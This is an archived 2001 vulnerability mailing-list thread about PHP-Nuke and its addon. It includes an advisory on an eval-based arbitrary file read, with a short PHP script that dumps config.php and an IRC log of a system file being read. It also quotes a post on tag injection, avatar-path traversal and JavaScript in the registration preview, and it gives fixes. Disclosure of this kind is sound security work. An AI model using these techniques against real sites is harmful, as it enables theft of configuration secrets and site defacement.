Vulnerability Development mailing list archives
Re: SERIOUS BUG IN PHPNUKE
From: supergate () twlc net
Date: Fri, 27 Jul 2001 23:33:32 +0200
i dont find it a serious bug... they can just ruin their details page... so who cares...however if u want a serious bug of php nuke... well there is one that allows to read any file on the sytem look at: http://www.twlc.net/article.php?sid=318 Mauro. admin of twlc dot net bug in nuke addon@#! DANGEROUS++!!! Posted on Friday, July 13 @ 19:53:31 CDT topic: advisories Evening everyone.. Sorry to tell you: php nuke addon is BUGGY. it got a *HUGE* bug that allows reading of every file on the system. let me explain you the bug... To do active forums and shit like that the author had to put: echo "<tr valign="top"><td bgcolor="#ffffff"> "; if (file_exists($content)) { $fp = fopen ($content, "r"); $content = fread($fp, filesize($content)); fclose ($fp); $content = "?>$content<?"; echo eval($content); } else { echo $content; } echo "</td></tr></table> "; replacing ."<tr valign="top"><td bgcolor="#ffffff"> " ."$content " ."</td></tr></table> " ON EACH THEME file... so what this code does? it check the content of the block and if this is a file it 'executes' it ... now i was like 'and if i put something like this' <?php $db = "config.php"; $fdb = @file($db); $ldb = count($fdb); while ($ldb>=0){ echo $fdb [$ldb]; $ldb--; }; ?> (sorry for the code, but i am not a php guru:P) and name it to exploit.php and put it in the main directory? it simply allowed me to read config.php but a friend of mine (shockzor THANK YOU BRO) told me "who could put a file like that on ur webserver" (i didnt made the test to upload it on my anonymous ftp but i think it could work:)) but thats just a possibility that this routine gives to you cus i went ahead doing these tests and and i found that this SIMPLY ALLOWS ANY FILE READING ON THE SYSTEM LOOK: (sg|code) u got autoexec.bat under c: ? (shockzor) no (shockzor) autoexec.nt (sg|code) good (sg|code) Menu for shit <sg|code> (sg|code) lh %SystemRoot%system32mscdexnt.exe lh %SystemRoot%system32 edir lh %SystemRoot%system32dosx (sg|code) now (sg|code) since i am (sg|code) 31337 (sg|code) WHAT? (sg|code) EHEH (shockzor) i dont think you can get out of the www root (sg|code) u think wrong (sg|code) cus i just did well u got to fixes: 1) bring back your themes file to: ."<tr valign="top"><td bgcolor="#ffffff"> " ."$content " ."</td></tr></table> " 2) get user.php go at the end of the file where there is: switch($op) { look down since you find case "edithome": edithome(); break; case "savehome": savehome($uid, $uname, $theme, $storynum, $ublockon, $ublock); break; remove this shit so users cant create their "home menu" thanks for the attention. btw i would like to thank shockzor that helped me making the tests! thanks bro..!:D thanks also goes out to all in #twlc on undernet peace out (thanks goes out also to the authors of php nuke and php nuke addon, i run em and i like em a lot ! keep up the good work) Mauro aka supergate root () twlc net http://www.twlc.net the following text has been posted to http://www.twlc.net http://www.phpnuke.org http://www.nukeaddon.com ----- Original Message ----- From: "MegaHz" <costcon () cytanet com cy> To: <VULN-DEV () securityfocus com>; <INCIDENTS () securityfocus com>; <bugtraq () securityfocus com> Cc: <mc2 () securitywire com> Sent: Friday, July 27, 2001 4:41 PM Subject: SERIOUS BUG IN PHPNUKE
Yes, phpnuke.org, was contacted.... First take a look at: http://phpnuke.org/user.php?op=userinfo&uname=MegaHz Then, read this................. PHPnuke Bugs. After testing just a few scripts on phpnuke I have noticed the following: Some fields in the registration form allow code and fail to filter out the tags. e.g Interests: src=http://www.anything.com/defaced.gif> Also when faking a form and posting from local file (user.php.html) after editing a few fields like the avatar picture for example, it is possible to escape surtain dirs with the ../../../../dir/pic.gif in the options field. (-- This is a local html file and set to post to user.php on the target server --) (no this is not a tag :P ) 001.gif 002.gif This tells user.php to save the avatar path as http://www.target.com/../../../dir_on_server/anyfile.ext and loads the
file
when the user info of the attacker is viewed. As we know webbugs (invisible or visible pics can be used for tracing) The preview of the Registration Form allows Javascript in the body. (not the user.php) but it does not allow ' or " . BUT you can user / instead of ' so this helps to will in variables in javascript. This can damage the site and make it look ugly. I coulnt be bothered to look at the rest of phpnuke... Tested on phpnuke v5.0 Firstly discovered by: dinopio ================================================= Andreas Constantinides (MegaHz) Owner - Admin of cHp - http://www.cyhackportal.com megahz () cyhackportal com ICQ#: 30136845 =================================================
Current thread:
- SERIOUS BUG IN PHPNUKE MegaHz (Jul 27)
- Re: SERIOUS BUG IN PHPNUKE supergate (Jul 28)
- Re: SERIOUS BUG IN PHPNUKE Josué (Jul 30)
- Re: SERIOUS BUG IN PHPNUKE MegaHz (Jul 30)